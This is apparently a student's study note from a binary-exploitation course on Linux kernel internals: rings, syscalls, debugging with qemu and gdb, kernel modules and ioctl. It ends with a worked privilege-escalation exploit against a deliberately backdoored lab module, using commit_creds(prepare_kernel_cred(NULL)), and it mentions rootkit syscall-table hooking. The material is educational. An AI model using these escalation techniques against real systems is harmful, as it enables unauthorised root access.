The Kernel

Created On 04. Jul 2021

Updated: 2021-07-04 19:39:44.791038000 +0000

Created By: acidghost

Inside of every system there is a central body that manages the interaction between processes and external resources. This is the kernel.

External Resources

Examples of kernel-only resources:

  • hlt instruction: halts the CPU until the next interrupt arrives.
  • in and out instructions for interacting with hardware peripherals.

Special registers

How does the computer know whether your code is allowed to access these resources, for example by executing mov register, cr3?

Kernel Access

The access model of a kernel is split into rings:

  • Ring 3 - userspace, very restricted. This is the least privileged ring, where applications run and most user activity happens, such as browsing the web or playing cool games.
  • Ring 2 - generally unused. Originally envisioned for device drivers that require somewhat more elevated privileges.
  • Ring 1 - similar to Ring 2.
  • Ring 0 - the kernel. Unrestricted supervisor mode, with full access to the hardware.
  • Ring -1 - hypervisor mode, used to handle sensitive actions at the virtual machine level. It can intercept the Ring 0 actions of a guest machine and handle them in the host OS.

The CPU tracks the current privilege level that controls the access to resources.

Kernel Types in Different OSes

  • Monolithic Kernel - a single kernel binary that handles all OS-level tasks. Drivers are libraries loaded into the kernel. Linux uses this design.
  • Microkernel - a tiny core binary that provides inter-process communication and basic interaction with the hardware. Drivers are userspace programs with special privileges. Used by Minix and seL4.
  • Hybrid Kernel - a mix of microkernel and monolithic kernel features and components. Windows and macOS use it.

Switching between rings

When the kernel boots up at Ring 0, it sets MSR_LSTAR to point to the syscall handler routine. When a userspace process wants to interact with the kernel, it executes the syscall instruction. The following then happens:

  1. The privilege level switches to Ring 0.
  2. Control flow jumps to the address stored in MSR_LSTAR.
  3. The return address is saved to rcx.

You can find the core pseudocode of syscall here.
When the kernel is ready to return to userspace, it executes the appropriate return instruction (such as sysret). The privilege level then switches to Ring 3 and control flow jumps to the address in rcx.

Debugging the Kernel

First of all, get yourself the qemu emulator, which will emulate your kernel, from here. The build might fail for a few reasons; if that happens to you, check the logs with dmesg. In my case it was quite straightforward: the crash was caused by insufficient memory. My virtual machine had 3GB of memory, but building the emulator requires at least 4GB. So, increasing your RAM to 4GB should eliminate one of the reasons why the kernel would fail to compile.
Let's also have an example ready. I will go with this example that I mentioned in Shellcoding.

.global _start
.intel_syntax noprefix
_start:
        mov rax, 60
        mov rdi, 42
        inc byte ptr [eip+8]
        mov word ptr [eip], 0x050e

Launch the kernel and then debug the running emulator with gdb linux5.4/vmlinux. This will drop us into kernel space.

These addresses are insane! The emulator will now hang; to let it run again, continue in gdb with c. I ran objdump on the shellcode above to find its entry address and then set a breakpoint there in gdb with break *0xaddress. When the shellcode is launched in the emulator, execution breaks at that address. Now we can see the shellcode.

We are outside of the emulator with gdb remotely attached to it, debugging a process inside it from kernel space. With this particular shellcode it took me a while to si until I got there (ni may malfunction in this case), but along the way we can see how the kernel reacts to different instructions until execution hits the syscall entry point!

We are inside the syscall entry point! From here you will see many interesting things. For example, upon entry the return address is saved in rcx, which is how the kernel handles syscall when it switches between rings. This way you can debug anything and trace how the kernel acts without worrying about unintentionally destroying your system. Remember to be specific about what you want to debug; breaking at exact addresses, as was done above, is a good way to do that. Read more on debugging and the kernel environment in the posts below.

Kernel Modules

Kernel modules are libraries that are loaded into the kernel. They are similar to userspace libraries such as libc. They have the .ko extension and, once loaded, have the same privileges as the kernel. Kernel modules implement and interact with different hardware and networking functionality.



Historically, kernel modules could, with a bit of effort, add system call entries by modifying the kernel's system call table. This is explicitly unsupported in modern kernels. Nowadays, the technique is mostly used by rootkits, which overwrite such entries to hide malicious activity from users.


Theoretically, a module could register an interrupt handler by using the LIDT and LGDT instructions and be triggered by, say, an int 42 instruction.
Useful one-byte interrupt instructions to hook:

  • int3 (0xcc): normally causes a SIGTRAP, but can be hooked!
  • int1 (0xf1): normally used for hardware debugging, but can be hooked!

With just these two one-byte instructions, it is possible to add checks on how the kernel executes functions and to verify that control flow has not been hijacked.

A module can also hook the Invalid Opcode Exception interrupt! This can be used to implement custom instructions in software, for example for security retrofitting. However, it is usually a bespoke interaction method.


The most common way of interacting with modules is via a file!

  • /dev: mostly traditional devices (e.g., /dev/dsp for audio)
  • /proc: started out in System V Unix as information about running processes. Linux expanded it into a disastrous mess of kernel interfaces. The solution...
  • /sys: non-process information interface with the kernel.

A module can register a file in one of the above locations. Userspace code can open() that file to interact with the module!

File read() and write()

One interaction mode is to handle read() and write() for your module's exposed file.
From kernel space:

static ssize_t device_read(struct file *filp, char *buffer, size_t length, loff_t *offset)
static ssize_t device_write(struct file *filp, const char *buf, size_t len, loff_t *off)

From user space:

fd = open("/dev/pwn-college", 0);
read(fd, buffer, 128);

Useful for modules that deal with streams (e.g., a stream of audio or video data). For example, if a module drives a specific hardware device, this is how someone would read() and write() to interact with it.

File ioctl()

ioctl(), which stands for Input/Output Control, is a syscall that provides a much more flexible interface. From kernel space:

static long device_ioctl(struct file *filp, unsigned int ioctl_num, unsigned long ioctl_param)

From user space:

int fd = open("/dev/pwn-college", 0);
ioctl(fd, COMMAND_CODE, &custom_data_structure);

Useful for setting and querying non-stream data (e.g., webcam resolution settings as opposed to the webcam video stream).
A lot of vulnerabilities come from ioctl()!

Inside the Kernel

The kernel can do anything, and kernel modules in a monolithic kernel are the kernel. Typically, the kernel:

  1. reads data from userspace (using copy_from_user - this is how the data passed to write() is received)
  2. "does stuff" (opens files, reads files, interacts with hardware, etc.)
  3. writes data to userspace (using copy_to_user - this is how the data returned by read() is delivered)
  4. returns to userspace

Explore Them!

In the emulator mentioned above you can find a few kernel modules:

  • hello_log: demonstrates the simplest possible kernel module
  • hello_dev_char: demonstrates a module exposing a /dev character device
  • hello_ioctl: exposes a /dev device with ioctl interface
  • hello_proc_char: exposes a /proc device
  • make_root: exposes a /proc device with an ioctl interface and an evil backdoor!

Module Compilation

You will find a Makefile in the /src path of the emulator. You can create your own module and append its name, with the .o extension, in the Makefile. Then build again and the module will be deployed in the fresh userspace filesystem. Remember, the userspace in the emulator is not persistent.

Kernel modules can be loaded using the init_module system call, usually through the insmod utility. A module is loaded with insmod mymodule.ko. List loaded modules with lsmod and remove one with rmmod mymodule.ko.
Bonus! cat will run forever in the emulator, so to read just once, you can use the dd utility and output the content to file descriptor 1:

dd if=/input_file of=/proc/self/fd/1 bs=128 count=1

Exploiting the Kernel

There are various attack vectors from which the kernel can be exploited, such as:

  1. Network
  2. Userspace (even from a sandbox!)
  3. Devices (USB drives...)

Usually this is done to crash the system, escalate privileges, install rootkits, gain access to other parts of the system, and so on.


  • copy_to_user(userspace_address, kernel_address, length);
  • copy_from_user(kernel_address, userspace_address, length);

This is how the kernel moves data between kernel space and userspace. The functions above are similar to memcpy() and should be handled with the same care: the length must be validated and the return value checked.

Kernel memory must be kept uncorrupted! Corruption can:

  • crash the system
  • brick the system
  • escalate process privileges
  • interfere with other processes

All user data should only be accessed with copy_to_user and copy_from_user.

Race Conditions

Kernel modules are not userspace programs.

  • they are always subject to multi-threading
  • they could disappear or swap resources mid-execution

Race conditions are huge problems plaguing kernels!

Privilege Escalation

The kernel tracks the privileges (and other data) of every running process in a task_struct:

struct task_struct {
	/*
	 * For reasons of header soup (see current_thread_info()), this
	 * must be the first element of task_struct.
	 */
	struct thread_info		thread_info;
	/* -1 unrunnable, 0 runnable, >0 stopped: */
	volatile long			state;

	/*
	 * This begins the randomizable portion of task_struct. Only
	 * scheduling-critical items should be added above here.
	 */

	void				*stack;
	refcount_t			usage;
	/* Per task flags (PF_*), defined further below: */
	unsigned int			flags;
	unsigned int			ptrace;


	/* Process credentials: */

	/* Tracer's credentials at attach: */
	const struct cred __rcu		*ptracer_cred;

	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;

	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;

	/* Cached requested key. */
	struct key			*cached_requested_key;
	/* ... */
};

As seen, it holds a lot of information that defines priorities, specific behaviors, alignments, etc., along with the credentials of the process, which are stored in the cred struct:

struct cred {
	atomic_t	usage;
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
	/* ... */
};

The credentials are supposed to be immutable (i.e., they can be cached elsewhere, and shouldn't be updated in place). Instead, they can be replaced:

commit_creds(struct cred *)

The cred struct seems a bit complex, but the kernel can make us a fresh one!

struct cred * prepare_kernel_cred(struct task_struct *reference_task_struct)

Luckily, if we pass NULL as the reference task_struct, it'll give us a cred struct with root access and full privileges! This can be achieved with commit_creds(prepare_kernel_cred(NULL));


Let's check it in action in our emulator. In the source file of the emulator in src/make_root.c you will find the file we will work with:

The module creates a device "pwn-college-root" in /proc, registers some operations for it, and installs the ioctl() handler. If ioctl() is called with the command number PWN and a parameter of 0x13371337, the handler grants us root access. Crazy, right? To exploit this, we need a program that opens "pwn-college-root" and passes the correct ioctl_num and ioctl_param, which makes the process become root! We don't know the value of PWN, so we need to reverse engineer it from the module. Running objdump on the src/make_root.ko file, we see:

We can see in the device_ioctl function that ebp is compared against 0x7001. ebp comes from esi, which holds the second argument. We have our value for PWN. First, create a new file locally with vi attack.c and write the exploit.

#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>

int main() {
	int fd = open("/proc/pwn-college-root", O_RDONLY); // open in read-only mode
	assert(fd >= 0);
	printf("Before UID: %d\n", getuid()); // our UID before the ioctl
	ioctl(fd, 0x7001, 0x13371337); // command number and parameter found above
	printf("After UID: %d\n", getuid()); // our UID after the ioctl
	return 0;
}

Compile statically, because there are no libraries inside the emulator:

gcc -static -o attack attack.c

Then launch the emulator, load the module with insmod make_root.ko, switch to the ctf user with su - ctf, launch the "attack" file, and observe privilege escalation against the kernel in action. After that we can even launch /bin/sh from inside the C program and it won't drop the privileges, since commit_creds(prepare_kernel_cred(0)); sets every *ID field to 0.


How do we know where commit_creds and prepare_kernel_cred are in memory?
Older kernels (or newer kernels with kernel ASLR, kASLR, disabled) are mapped at predictable locations. Do you remember the old IoT joke? It is likely that kASLR is also disabled on most embedded devices. We can also use /proc/kallsyms, an interface through which the kernel gives root these addresses. If you are root, you can find the address of commit_creds with cat /proc/kallsyms | grep commit_creds. Debugging as we did above is an option as well. Otherwise, it's the exact same problem as userspace ASLR! (see Memory Errors)


Section: Binary Exploitation (PWN)